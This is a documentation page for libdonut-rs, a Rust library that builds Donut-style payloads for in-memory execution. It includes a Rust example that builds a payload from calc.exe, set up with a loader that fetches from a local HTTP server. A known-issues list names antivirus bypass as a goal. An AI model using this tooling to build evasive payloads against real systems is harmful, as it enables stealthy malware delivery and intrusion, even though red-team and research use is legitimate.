libdonut-rs 0.1.1

Public API for the Donut-rs project
Documentation

Donut-rs

A spiritual successor for TheWover's Donut written in Rust

This crate provides the full API for building Donut-rs payloads. For the CLI tool, visit this link

[!WARNING] Currently only the Windows loader is supported. The Unix loader is currently gated behind the unstable feature due to unexpected segmentation faults. The Script loader is currently unavailable as well due to time constraints.

Using in other tools

  • Via the cargo cli:
cargo add libdonut-rs
  • Via Cargo.toml:
libdonut-rs = "0.1.0"

Features

name description
loader Feature that enables the no_std loader components used for in-memory execution
logging Enables verbose console logging (intended only for debugging since it's VERY noisy)
libc Required by the (currently unstable) Unix loader. May be removed in the future
unstable WIP components and features that are not yet ready for release
std Enables the high-level API for generating and building payloads. Enabled by default.

Example Usage

use std::io;
use libdonut_rs::{Donut, DonutConfig, DonutHttpInstance};

fn main() -> io::Result<()> {
    let http_opts = DonutHttpInstance::new("http://127.0.0.1:9001", Some("/payload.bin"), 5, Some("GET"), false);
    let cfg = DonutConfig::new("C:\\Windows\\System32\\calc.exe").http_options(Some(http_opts));
    println!("Created config: {cfg:?}");

    let mut donut = Donut::new(&cfg)?;
    println!("Created donut object");
    donut.build()?;
    println!("Finished building donut object");

    let p = donut.payload()?;
    let md = donut.metadata();
    println!("Metadata: {md:?}");
    println!("Payload size: {}", p.len());
    Ok(())
}

Known Issues

  • Binaries built using Visual Studio (the msvc toolkit in general) currently cause segfaults
  • Arguments aren't being passed to the executed binary
  • Unix loader causes segfaults when run
  • AV bypass still doesn't work

References